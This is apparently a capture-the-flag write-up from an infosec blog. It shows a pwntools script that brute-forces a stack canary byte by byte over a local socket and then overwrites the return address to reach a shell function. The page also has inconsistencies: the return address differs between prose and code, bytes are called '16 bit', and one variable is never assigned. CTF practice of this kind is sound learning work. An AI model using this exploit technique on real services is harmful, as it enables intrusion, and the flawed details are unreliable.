			content: ""counter(lst-ctn-kix_pj27egx948rq-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-1>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-1, lower-latin) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-0 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-7 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-8 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-7>li:before {
			content: "\0025cb  "
		}

		ol.lst-kix_fi2xbrv6fzbg-5 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-6 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-2>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-2, lower-roman) ". "
		}

		.lst-kix_pj27egx948rq-6>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-6, decimal) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-7 {
			list-style-type: none
		}

		.lst-kix_lh5aqr9xz8oa-5>li:before {
			content: "\0025a0  "
		}

		ul.lst-kix_lh5aqr9xz8oa-8 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-5 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-6 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-3 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-3>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-3, decimal) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-4 {
			list-style-type: none
		}

		ul.lst-kix_lh5aqr9xz8oa-1 {
			list-style-type: none
		}

		.lst-kix_pj27egx948rq-4>li:before {
			content: ""counter(lst-ctn-kix_pj27egx948rq-4, lower-latin) ". "
		}

		ul.lst-kix_lh5aqr9xz8oa-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-0 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-6>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-6, decimal) ". "
		}

		.lst-kix_pj27egx948rq-6>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-6
		}

		ol.lst-kix_avc0gcoxesrz-1 {
			list-style-type: none
		}

		ol.lst-kix_n6wv8d8mqg4j-6.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-6 0
		}

		.lst-kix_5bbn6o1fums7-4>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-4
		}

		.lst-kix_avc0gcoxesrz-2>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-2, lower-roman) ". "
		}

		ol.lst-kix_avc0gcoxesrz-8 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-5>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-5, lower-roman) ". "
		}

		ol.lst-kix_q172a0nf55p3-6.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-6 0
		}

		ol.lst-kix_avc0gcoxesrz-6 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-7 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-0>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-0, decimal) ". "
		}

		ol.lst-kix_avc0gcoxesrz-4 {
			list-style-type: none
		}

		.lst-kix_avc0gcoxesrz-8>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-8, lower-roman) ". "
		}

		.lst-kix_n6wv8d8mqg4j-7>li:before {
			content: ""counter(lst-ctn-kix_n6wv8d8mqg4j-7, lower-latin) ". "
		}

		ol.lst-kix_avc0gcoxesrz-5 {
			list-style-type: none
		}

		ol.lst-kix_t8twi5tix7m3-2.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-2 0
		}

		ol.lst-kix_avc0gcoxesrz-2 {
			list-style-type: none
		}

		ol.lst-kix_avc0gcoxesrz-3 {
			list-style-type: none
		}

		ol.lst-kix_fi2xbrv6fzbg-3.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-3 0
		}

		ol.lst-kix_pj27egx948rq-0.start {
			counter-reset: lst-ctn-kix_pj27egx948rq-0 0
		}

		.lst-kix_pj27egx948rq-4>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-4
		}

		.lst-kix_avc0gcoxesrz-3>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-3
		}

		.lst-kix_n6wv8d8mqg4j-7>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-7
		}

		ol.lst-kix_t8twi5tix7m3-5.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-5 0
		}

		ol.lst-kix_avc0gcoxesrz-0.start {
			counter-reset: lst-ctn-kix_avc0gcoxesrz-0 0
		}

		.lst-kix_q172a0nf55p3-4>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-4
		}

		.lst-kix_avc0gcoxesrz-4>li:before {
			content: ""counter(lst-ctn-kix_avc0gcoxesrz-4, lower-latin) ". "
		}

		.lst-kix_fi2xbrv6fzbg-1>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-1
		}

		.lst-kix_t8twi5tix7m3-2>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-2, lower-roman) ". "
		}

		ol.lst-kix_q172a0nf55p3-5 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-4 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-7.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-7 0
		}

		.lst-kix_c8glqpz4x2ma-6>li:before {
			content: "-  "
		}

		.lst-kix_c8glqpz4x2ma-8>li:before {
			content: "-  "
		}

		ol.lst-kix_q172a0nf55p3-3 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-2 {
			list-style-type: none
		}

		.lst-kix_t8twi5tix7m3-0>li:before {
			content: ""counter(lst-ctn-kix_t8twi5tix7m3-0, decimal) ". "
		}

		ol.lst-kix_t8twi5tix7m3-3.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-3 0
		}

		ol.lst-kix_q172a0nf55p3-8 {
			list-style-type: none
		}

		ol.lst-kix_5bbn6o1fums7-1.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-1 0
		}

		ol.lst-kix_q172a0nf55p3-7 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-6 {
			list-style-type: none
		}

		.lst-kix_n6wv8d8mqg4j-6>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-6
		}

		.lst-kix_c8glqpz4x2ma-0>li:before {
			content: "-  "
		}

		.lst-kix_avc0gcoxesrz-4>li {
			counter-increment: lst-ctn-kix_avc0gcoxesrz-4
		}

		.lst-kix_c8glqpz4x2ma-2>li:before {
			content: "-  "
		}

		.lst-kix_c8glqpz4x2ma-4>li:before {
			content: "-  "
		}

		ol.lst-kix_5bbn6o1fums7-0.start {
			counter-reset: lst-ctn-kix_5bbn6o1fums7-0 0
		}

		ol.lst-kix_t8twi5tix7m3-4.start {
			counter-reset: lst-ctn-kix_t8twi5tix7m3-4 0
		}

		ol.lst-kix_q172a0nf55p3-8.start {
			counter-reset: lst-ctn-kix_q172a0nf55p3-8 0
		}

		ol.lst-kix_fi2xbrv6fzbg-1.start {
			counter-reset: lst-ctn-kix_fi2xbrv6fzbg-1 0
		}

		.lst-kix_fi2xbrv6fzbg-2>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-2
		}

		.lst-kix_2yzjaagjqxah-6>li:before {
			content: "\0025cf  "
		}

		.lst-kix_q172a0nf55p3-5>li {
			counter-increment: lst-ctn-kix_q172a0nf55p3-5
		}

		.lst-kix_2yzjaagjqxah-2>li:before {
			content: "\0025a0  "
		}

		.lst-kix_2yzjaagjqxah-4>li:before {
			content: "\0025cb  "
		}

		.lst-kix_fi2xbrv6fzbg-8>li {
			counter-increment: lst-ctn-kix_fi2xbrv6fzbg-8
		}

		.lst-kix_pj27egx948rq-5>li {
			counter-increment: lst-ctn-kix_pj27egx948rq-5
		}

		.lst-kix_5bbn6o1fums7-5>li {
			counter-increment: lst-ctn-kix_5bbn6o1fums7-5
		}

		.lst-kix_n6wv8d8mqg4j-0>li {
			counter-increment: lst-ctn-kix_n6wv8d8mqg4j-0
		}

		ol.lst-kix_n6wv8d8mqg4j-8.start {
			counter-reset: lst-ctn-kix_n6wv8d8mqg4j-8 0
		}

		.lst-kix_2yzjaagjqxah-0>li:before {
			content: "\0025cf  "
		}

		ol.lst-kix_q172a0nf55p3-1 {
			list-style-type: none
		}

		ol.lst-kix_q172a0nf55p3-0 {
			list-style-type: none
		}

		ol {
			margin: 0;
			padding: 0
		}

		table td,
		table th {
			padding: 0
		}

		.c7 {
			color: #000000;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 11pt;
			font-family: "Arial";
			font-style: normal
		}

		.c19 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 14pt
		}

		.c1 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left;
			height: 11pt
		}

		.c8 {
			color: #ce9178;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c22 {
			padding-top: 14pt;
			text-indent: 36pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: right
		}

		.c5 {
			color: #6a9955;
			font-weight: 400;
			text-decoration: none;
			vertical-align: baseline;
			font-size: 12pt;
			font-family: "Courier New";
			font-style: normal
		}

		.c0 {
			background-color: #1e1e1e;
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.3571428571428572;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c23 {
			padding-top: 14pt;
			padding-bottom: 4pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c18 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: center
		}

		.c16 {
			padding-top: 0pt;
			padding-bottom: 0pt;
			line-height: 1.15;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.c13 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #c586c0;
			font-weight: 400
		}

		.c4 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #d7ba7d;
			font-weight: 400
		}

		.c15 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #dcdcaa;
			font-weight: 400
		}

		.c24 {
			color: #d4d4d4;
			font-weight: 400;
			font-size: 10.5pt;
			font-family: "Courier New"
		}

		.c20 {
			font-size: 18pt;
			font-family: "Montserrat";
			color: #000000;
			font-weight: 900
		}

		.c14 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #569cd6;
			font-weight: 400
		}

		.c10 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #ce9178;
			font-weight: 400
		}

		.c12 {
			color: #000000;
			font-weight: 400;
			font-size: 14pt;
			font-family: "Montserrat"
		}

		.c17 {
			color: #434343;
			font-weight: 400;
			font-size: 14pt;
			font-family: "Montserrat"
		}

		.c6 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #b5cea8;
			font-weight: 400
		}

		.c11 {
			color: #000000;
			font-weight: 300;
			font-size: 14pt;
			font-family: "Roboto Mono"
		}

		.c3 {
			font-size: 12pt;
			font-family: "Courier New";
			color: #d4d4d4;
			font-weight: 400
		}

		.c25 {
			font-family: "Montserrat";
			color: #000000;
			font-weight: 800
		}

		.c9 {
			text-decoration: none;
			vertical-align: baseline;
			font-style: normal
		}

		.c21 {
			background-color: #ffffff;
			max-width: 600pt;
			padding: 72pt 72pt 72pt 72pt;
			margin: auto;
		}

		.c2 {
			height: 11pt
		}

		.title {
			padding-top: 0pt;
			color: #000000;
			font-size: 26pt;
			padding-bottom: 3pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		.subtitle {
			padding-top: 0pt;
			color: #666666;
			font-size: 15pt;
			padding-bottom: 16pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		li {
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		p {
			margin: 0;
			color: #000000;
			font-size: 11pt;
			font-family: "Arial"
		}

		h1 {
			padding-top: 20pt;
			color: #000000;
			font-size: 20pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h2 {
			padding-top: 18pt;
			color: #000000;
			font-size: 16pt;
			padding-bottom: 6pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h3 {
			padding-top: 16pt;
			color: #434343;
			font-size: 14pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h4 {
			padding-top: 14pt;
			color: #666666;
			font-size: 12pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h5 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			orphans: 2;
			widows: 2;
			text-align: left
		}

		h6 {
			padding-top: 12pt;
			color: #666666;
			font-size: 11pt;
			padding-bottom: 4pt;
			font-family: "Arial";
			line-height: 1.15;
			page-break-after: avoid;
			font-style: italic;
			orphans: 2;
			widows: 2;
			text-align: left
		}
	</style>
</head>

<body class="c21">
	<h3 class="c22" id="h.3zvpwyx0el37"><span class="c20">71<br></span><span
			class="c20">/<br>100<br>Days<br>Of<br>InfoSec</span>
		<hr>
	</h3>
	<h3 class="c23" id="h.uhn6dzi5itr4"><span class="c25">CTFd &mdash; &nbsp;Brutus (part 3 - brute forcing
			canary)</span></h3>
	<p class="c1"><span class="c7"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c16"><span class="c12 c9">So we know how the program is working over socket, we can connect to it. Now we
			need to look at the program and define our oracle.</span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c16"><span class="c12 c9">Now the input is being stored at RBP - 0x90 offset</span></p>
	<p class="c16"><span class="c12 c9">The canary is is at RBP - 0x8</span></p>
	<p class="c16"><span class="c12 c9">That means the padding needs to be 0x90 - 0x8 = 0x88 or 136 bytes</span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c16"><span class="c12 c9">Wrote a script to brute force the canary byte by byte locally :</span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c16"><span class="c11 c9">Note: Canary can be brute forced byte by byte which significantly reduces the
			amount of combinations one needs to try. Brute forcing 8 [16 bit] values is far less work than brute forcing
			1 [64 bit] value </span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c0"><span class="c13">from</span><span class="c3">&nbsp;pwn </span><span class="c13">import</span><span
			class="c3 c9">&nbsp;*</span></p>
	<p class="c0 c2"><span class="c3 c9"></span></p>
	<p class="c0"><span class="c3">context.log_level =</span><span class="c8">&#39;debug&#39;</span></p>
	<p class="c0"><span class="c3">passstring = </span><span class="c8">&#39;goodbye&#39;</span></p>
	<p class="c0"><span class="c5"># p = process(&#39;./new_brutus&#39;) #although you can start this here, it throws an
			error. better start it manually ina diff terminal</span></p>
	<p class="c0"><span class="c3">payload = </span><span class="c10">&#39;A&#39;</span><span class="c3">*</span><span
			class="c6">136</span><span class="c3">&nbsp;+ </span><span class="c10">&#39;</span><span
			class="c4">\x00</span><span class="c8">&#39;</span></p>
	<p class="c0 c2"><span class="c3 c9"></span></p>
	<p class="c0"><span class="c5">#for brute forcing the last byte of the canary</span></p>
	<p class="c0"><span class="c5"># lst = [0x78, 0x47, 0xe2, 0xe4, 0x32, 0xba]</span></p>
	<p class="c0"><span class="c5"># payload = &#39;A&#39;*136 + &#39;\x00&#39; + \</span></p>
	<p class="c0"><span class="c5"># p8(lst[0]) + p8(lst[1]) + p8(lst[2]) + \</span></p>
	<p class="c0"><span class="c5"># p8(lst[3]) + p8(lst[4]) + p8(lst[5])</span></p>
	<p class="c0 c2"><span class="c3 c9"></span></p>
	<p class="c0"><span class="c3 c9">lst = []</span></p>
	<p class="c0 c2"><span class="c3 c9"></span></p>
	<p class="c0"><span class="c13">for</span><span class="c3">&nbsp;j </span><span class="c14">in</span><span
			class="c3">&nbsp;</span><span class="c15">range</span><span class="c3">&nbsp;(</span><span
			class="c6">0</span><span class="c3">,</span><span class="c6">7</span><span class="c3 c9">):</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp;</span><span class="c13">for</span><span class="c3">&nbsp;i </span><span
			class="c14">in</span><span class="c3">&nbsp;</span><span class="c15">range</span><span
			class="c3">(</span><span class="c6">0</span><span class="c3">,</span><span class="c6">256</span><span
			class="c3 c9">):</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp;remote(</span><span
			class="c10">&#39;127.0.0.1&#39;</span><span class="c3">, </span><span class="c6">8000</span><span
			class="c3">)</span><span class="c5">&nbsp;#local process but connecting over socket</span></p>
	<p class="c0"><span class="c3 c9">&nbsp; &nbsp; &nbsp; &nbsp;payloadcp = payload</span></p>
	<p class="c0"><span class="c3 c9">&nbsp; &nbsp; &nbsp; &nbsp;payloadcp += p8(i)</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp;r.sendafter(</span><span
			class="c10">&#39;name?</span><span class="c4">\n</span><span class="c10">&#39;</span><span class="c3">,
		</span><span class="c10">&#39;200</span><span class="c4">\n</span><span class="c10">&#39;</span><span
			class="c3 c9">)</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp;r.sendafter(</span><span class="c10">&#39;data</span><span
			class="c4">\n</span><span class="c10">&#39;</span><span class="c3 c9">, payloadcp)</span></p>
	<p class="c0"><span class="c3 c9">&nbsp; &nbsp; &nbsp; &nbsp;rr = r.recv()</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c15">print</span><span
			class="c3 c9">(p8(i))</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c13">if</span><span
			class="c3">&nbsp;passstring </span><span class="c14">in</span><span class="c3 c9">&nbsp;rr:</span></p>
	<p class="c0"><span class="c3 c9">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;lst.append(i)</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c15">print</span><span
			class="c3 c9">(lst)</span></p>
	<p class="c0"><span class="c3 c9">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;payload += p8(i)</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c15">print</span><span
			class="c3 c9">(payload)</span></p>
	<p class="c0"><span class="c3">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span><span class="c13 c9">break</span></p>
	<p class="c0"><span class="c15">print</span><span class="c3 c9">(payload)</span></p>
	<p class="c0 c2"><span class="c3 c9"></span></p>
	<p class="c0"><span class="c3">final_payload = </span><span class="c10">&#39;A&#39;</span><span
			class="c3">*</span><span class="c6">136</span><span class="c3">&nbsp;+ </span><span
			class="c10">&#39;</span><span class="c4">\x00</span><span class="c10">&#39;</span><span class="c3">&nbsp;+
			p8(lst[</span><span class="c6">0</span><span class="c3">]) + p8(lst[</span><span class="c6">1</span><span
			class="c3">]) + p8(lst[</span><span class="c6">2</span><span class="c3 c9">]) +\</span></p>
	<p class="c0"><span class="c3">p8(lst[</span><span class="c6">3</span><span class="c3">]) + p8(lst[</span><span
			class="c6">4</span><span class="c3">]) + p8(lst[</span><span class="c6">5</span><span class="c3">]) +
			p8(lst[</span><span class="c6">6</span><span class="c3">]) + </span><span
			class="c10">&#39;B&#39;</span><span class="c3">*</span><span class="c6">8</span><span class="c3">&nbsp;+
			p64(</span><span class="c14">0x</span><span class="c6">00401276</span><span class="c3">) + </span><span
			class="c10">&#39;</span><span class="c4">\n</span><span class="c8">&#39;</span></p>
	<p class="c0 c2"><span class="c3 c9"></span></p>
	<p class="c0"><span class="c3">r = remote(</span><span class="c10">&#39;127.0.0.1&#39;</span><span class="c3">,
		</span><span class="c6">8000</span><span class="c3">) </span><span class="c5">#local process but connecting over
			socket</span></p>
	<p class="c0"><span class="c3">r.sendafter(</span><span class="c10">&#39;name?</span><span class="c4">\n</span><span
			class="c10">&#39;</span><span class="c3">, </span><span class="c10">&#39;200</span><span
			class="c4">\n</span><span class="c10">&#39;</span><span class="c3 c9">)</span></p>
	<p class="c0"><span class="c3">r.sendafter(</span><span class="c10">&#39;data</span><span class="c4">\n</span><span
			class="c10">&#39;</span><span class="c3">, final_payload)</span></p>
	<p class="c16"><span class="c12 c9">&nbsp;</span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c9 c12"></span></p>
	<p class="c16"><span class="c12 c9">The final payload has the address 0x0040012b0 which is the address of the first
			instruction in the give shell function</span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c16"><span class="c11 c9">Once the canary was brute forced, it was easy to get the flag from the
			server</span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c0"><span class="c13">from</span><span class="c3">&nbsp;pwn </span><span class="c13">import</span><span
			class="c3 c9">&nbsp;*</span></p>
	<p class="c0 c2"><span class="c9 c24"></span></p>
	<p class="c0"><span class="c3">lst = [</span><span class="c14">0x</span><span class="c6">78</span><span class="c3">,
		</span><span class="c14">0x</span><span class="c6">47</span><span class="c3">, </span><span
			class="c14">0x</span><span class="c6">e2</span><span class="c3">, </span><span class="c14">0x</span><span
			class="c6">e4</span><span class="c3">, </span><span class="c14">0x</span><span class="c6">32</span><span
			class="c3">, </span><span class="c14">0x</span><span class="c6">ba</span><span class="c3">, </span><span
			class="c14">0x</span><span class="c6">a6</span><span class="c3 c9">]</span></p>
	<p class="c0"><span class="c3">payload = </span><span class="c10">&#39;A&#39;</span><span class="c3">*</span><span
			class="c6">136</span><span class="c3">&nbsp;+ </span><span class="c10">&#39;</span><span
			class="c4">\x00</span><span class="c10">&#39;</span><span class="c3 c9">&nbsp;+ \</span></p>
	<p class="c0"><span class="c3">p8(lst[</span><span class="c6">0</span><span class="c3">]) + p8(lst[</span><span
			class="c6">1</span><span class="c3">]) + p8(lst[</span><span class="c6">2</span><span class="c3 c9">]) +
			\</span></p>
	<p class="c0"><span class="c3">p8(lst[</span><span class="c6">3</span><span class="c3">]) + p8(lst[</span><span
			class="c6">4</span><span class="c3">]) + p8(lst[</span><span class="c6">5</span><span class="c3 c9">]) +
			\</span></p>
	<p class="c0"><span class="c3">p8(lst[</span><span class="c6">6</span><span class="c3">]) + </span><span
			class="c10">&#39;B&#39;</span><span class="c3">*</span><span class="c6">8</span><span class="c3">&nbsp;+
			p64(</span><span class="c14">0x</span><span class="c6">0000000000401276</span><span class="c3 c9">)</span>
	</p>
	<p class="c0 c2"><span class="c11 c9"></span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c1"><span class="c9 c11"></span></p>
	<p class="c16"><span class="c11 c9">Flag : flag{w0w_thats_a_l0t_0f_conn3cti0ns_96ec69c8220f}</span></p>
	<p class="c1"><span class="c11 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<p class="c1"><span class="c12 c9"></span></p>
	<h3 class="c19" id="h.dardaoz37s2v"><span class="c17 c9"></span></h3>
	<hr>
	<p class="c18"><span class="c12 c9">
		<a href='/100days/day70.html'>Previous</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/'>Home</a>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      <a href='/100days/day72.html'>Next</a>	
	</span>
	</p>
</body>

</html>